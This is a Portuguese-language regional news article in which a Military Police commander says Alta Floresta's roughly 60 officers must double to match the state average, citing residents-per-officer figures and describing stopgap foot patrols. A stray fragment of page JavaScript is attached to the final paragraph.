Capa / Em Destaque / Regional da PM diz que efetivo tem que dobrar para acompanhar a média estadual

Regional da PM diz que efetivo tem que dobrar para acompanhar a média estadual

DSC_0151Da Redação

O Tenente Coronel Eduardo Luiz Silva, comandante do IX Batalhão Regional da Polícia Militar, reclamou da falta de efetivo para pode cumprir a função da PM de maneira a satisfazer os interesses da sociedade. Apesar de reclamar, ele afirmou estar realizando ações no sentido de melhorar a sensação de segurança. Ainda assim, para Te Cel Luiz, para acompanhar as condições médias do Estado, seria necessário dobrar o efetivo em Alta Floresta, que atualmente é de em torno de 60 homens, para 120.

Os números de um levantamento feito pela Polícia Militar já foram apresentados na secretaria de segurança pública e apontam que na média atual, no estado, há um policial a cada 400 habitantes. Em Alta Floresta, são 900 habitantes por policial. No CR-IX, há um município que está em situação ainda pior, Nova Bandeirantes, com 2.700 habitantes para cada policial. “Pra chegar na média, não é ainda um indicador ideal, é a média do estado só, mas (dá) pra ver quanto deficiente está região. A situação é critica no geral”, afirmou o policial.

Ainda assim, segundo o que anunciou, ações para minimizar a sensação de insegurança estão sendo executadas. Uma delas é a instituição de “policiamento a pé” na área comercial da cidade. Só que para fazer isso, o Comando está sacrificando alguns setores fundamentais no quartel, como é o caso da administração. “Hoje nós estamos trabalhando praticamente além do limite porque estamos usando os alunos do curso de formação e também, a parte administrativa, com certo prejuízo da parte administrativa, para que a gente possa tá dando uma prioridade maior ao policiamento ostensivo, neste momento em que a sociedade está clamando pela presença da polícia”.

Mas o comandante da PM deixou claro, para que possa manter o trabalho preventivo, é preciso de material humano. “De imediato o que a gente pode fazer é aumentar a ostensividade, pelo menos durante um período um reforço externo no policiamento”.d.getElementsByTagName(‘head’)[0].appendChild(s);

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top